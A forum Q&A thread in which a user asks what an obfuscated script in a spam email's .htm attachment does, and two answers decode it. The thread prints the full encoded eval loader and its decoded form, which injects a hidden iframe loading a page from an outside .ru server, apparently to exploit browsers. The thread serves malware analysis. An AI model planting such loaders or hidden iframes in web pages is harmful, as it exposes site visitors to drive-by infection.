javascript in spam email; what's it trying to do?
Asked Answered
Y

2

5

I received a spam message that had a .htm attachment. I opened the file in gedit on my linux machine and saw the following. Does the script it would try to run do anything? It looks harmless, yet confusing.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Please wait untill the page loads...</title>
 </head>
 <body>  
<h1>Loading... Please Wait...</h1><br>
 </body>`

<script>
if(window['doc'+'ume'+'nt'])
    aa=/\w/.exec(new Date()).index+[];
    aaa='0';
    try {
        new location();
    }catch(qqq){
        ss=String;
        if(aa===aaa)
            f='-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
        .split('q');
        md='a';
        e=window['e'+'val'];
        w=f;
        s='';
        fr='fromChar';
        r=ss[fr+'Code'];
        for(i=0;-i>-w.length;i+=1) {
            j=i;
            s=s+r(39+1*w[j]);
        }
        if(Math.round(-4*Math.tan(Math.atan(0.5)))===-2)
            z=s;
        e(z);
    }
</script>

</html>
Yaron answered 28/2, 2012 at 20:56 Comment(0)
M
11

Encoded in f is the following code, which the script evals (executes):

if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

I assume whatever lives on http://cparabnormapoopdsf.ru:8080 is evil and tries to exploit some kind of browser vulnerabilities.


I was able to extract f by basically copying what the script is doing:

var f = '-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
    .split('q');

That gets you an array of numbers, which the script assembles into a string by adding 39 to each:

for (var i=0, s=''; i < f.length; i++) s+=String.fromCharCode(39+1*f[i]);
Melany answered 28/2, 2012 at 21:4 Comment(1)
#9479363Levona
O
5

The encoded bit turns into:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
    f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
    f.style.top='0';f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

The domain at http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php does something unknown. The server is running nginx and just redirects to google.com. Perhaps at some later point it will do something else.

Oriana answered 28/2, 2012 at 21:8 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.